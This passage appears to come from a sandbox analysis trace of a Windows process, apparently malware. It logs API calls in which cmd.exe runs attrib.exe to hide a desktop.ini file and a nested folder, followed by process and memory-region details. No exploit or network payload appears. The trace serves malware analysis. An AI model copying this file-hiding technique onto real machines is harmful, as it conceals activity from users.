lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.147] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.147] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0233.147] _close (_FileHandle=3) returned 0 [0233.147] GetConsoleTitleW (in: lpConsoleTitle=0x1ef8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.148] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0233.148] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0233.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0233.148] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.148] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.148] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0233.148] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0233.148] GetConsoleTitleW (in: lpConsoleTitle=0x1ef63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.148] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef58c | out: lpAttributeList=0x1ef4c4, lpSize=0x1ef58c) returned 1 [0233.148] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4c4, lpPreviousValue=0x0) returned 1 [0233.148] GetStartupInfoW (in: lpStartupInfo=0x1ef480 | out: lpStartupInfo=0x1ef480*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0233.149] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0233.149] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef56c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessInformation=0x1ef56c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd4, dwThreadId=0xd8)) returned 1 [0233.150] CloseHandle (hObject=0x50) returned 1 [0233.150] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0233.150] GetEnvironmentStringsW () returned 0x3b25e0* [0233.150] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.151] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0233.346] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1ef460 | out: lpExitCode=0x1ef460*=0x0) returned 1 [0233.346] CloseHandle (hObject=0x4c) returned 1 [0233.346] _vsnwprintf (in: _Buffer=0x1ef5a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef46c | out: _Buffer="00000000") returned 8 [0233.346] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.346] GetEnvironmentStringsW () returned 0x3b25e0* [0233.346] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.346] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.346] GetEnvironmentStringsW () returned 0x3b25e0* [0233.346] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.347] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4c4 | out: lpAttributeList=0x1ef4c4) [0233.347] GetConsoleTitleW (in: lpConsoleTitle=0x1ef8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.347] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0233.347] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0233.347] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0233.347] FindClose (in: hFindFile=0x3b3e00 | out: hFindFile=0x3b3e00) returned 1 [0233.347] FindClose (in: hFindFile=0x3b3e00 | out: hFindFile=0x3b3e00) returned 1 [0233.347] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0233.347] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0233.347] GetConsoleTitleW (in: lpConsoleTitle=0x1ef63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.348] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef58c | out: lpAttributeList=0x1ef4c4, lpSize=0x1ef58c) returned 1 [0233.348] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4c4, lpPreviousValue=0x0) returned 1 [0233.348] GetStartupInfoW (in: lpStartupInfo=0x1ef480 | out: lpStartupInfo=0x1ef480*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0233.348] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0233.348] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef56c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessInformation=0x1ef56c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc, dwThreadId=0xe0)) returned 1 [0233.349] CloseHandle (hObject=0x4c) returned 1 [0233.349] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0233.349] GetEnvironmentStringsW () returned 0x3b29d8* [0233.349] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.349] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0233.400] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef460 | out: lpExitCode=0x1ef460*=0x0) returned 1 [0233.400] CloseHandle (hObject=0x50) returned 1 [0233.400] _vsnwprintf (in: _Buffer=0x1ef5a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef46c | out: _Buffer="00000000") returned 8 [0233.401] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.401] GetEnvironmentStringsW () returned 0x3b29d8* [0233.401] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.401] GetEnvironmentStringsW () returned 0x3b29d8* [0233.401] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.401] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4c4 | out: lpAttributeList=0x1ef4c4) [0233.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0233.401] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.401] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0233.401] SetConsoleInputExeNameW () returned 0x1 [0233.401] GetConsoleOutputCP () returned 0x1b5 [0233.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0233.401] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.402] exit (_Code=0) Process: id = "622" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16840" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34856 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34857 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34858 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34859 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34860 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34861 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34862 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34863 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34864 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34865 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34866 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34867 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34868 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34869 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 34870 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 34871 start_va = 0x6f020000 end_va = 0x6f03cfff entry_point = 0x6f020000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34872 start_va = 0x75540000 end_va = 0x75589fff entry_point = 